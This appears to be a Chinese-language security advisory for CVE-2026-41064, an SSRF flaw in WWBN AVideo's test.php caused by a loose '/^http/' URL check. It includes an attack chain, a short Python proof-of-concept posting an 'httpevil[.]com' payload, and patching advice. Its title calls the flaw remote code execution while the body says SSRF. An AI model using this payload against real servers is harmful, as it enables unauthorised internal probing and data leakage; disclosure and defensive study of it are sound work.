CVE-2026-41064 CVSS 9.3 严重

CVE-2026-41064 WWBN AVideo远程代码执行漏洞

披露日期: 2026-04-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41064

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

9.3 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo是一个开源视频平台。在29.0及以下版本中，`test.php`文件的修复不完整。尽管对`wget`使用了`escapeshellarg`，但`file_get_contents`和`curl`路径未经过清理，且URL验证正则表达式存在绕过漏洞，允许攻击者构造恶意请求。

技术细节

该漏洞源于WWBN AVideo的`test.php`文件中URL验证和处理的逻辑缺陷。开发者虽然对`wget`使用了`escapeshellarg`进行修复，但忽略了`file_get_contents`和`curl`这两个代码路径的清理。关键问题在于URL验证的正则表达式`/^http/`设计不严谨，它仅检查字符串是否以'http'开头，因此接受像`httpevil[.]com`这样的字符串。攻击者利用此绕过验证，将恶意URL传递给未经过滤的函数，从而发起SSRF攻击，探测内网或读取敏感文件。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行的是WWBN AVideo 29.0或更低版本。

STEP 2

漏洞利用

攻击者向test.php发送特制请求，URL参数为绕过正则验证的恶意字符串（如httpevil[.]com）。

STEP 3

执行攻击

服务器端未经过滤的curl或file_get_contents函数处理该URL，向攻击者控制的服务器发起请求（SSRF），可能导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://target-site/AVideo/test.php"

# The regex /^http/ accepts 'httpevil[.]com' because it starts with 'http'
# This bypasses the intended validation
payload_url = "httpevil[.]com" 

data = {
    "url": payload_url,
    # Other parameters might be required depending on the form
}

try:
    response = requests.post(target_url, data=data)
    if response.status_code == 200:
        print("[+] Request sent successfully")
        print("[+] Server response:")
        print(response.text)
    else:
        print("[-] Failed to send request")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

WWBN AVideo <= 29.0

防御指南

临时缓解措施

建议立即应用官方提供的修复补丁。如果不能立即升级，应严格限制对`test.php`文件的访问，或直接将其从服务器中移除，以防止未授权的用户利用此漏洞。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表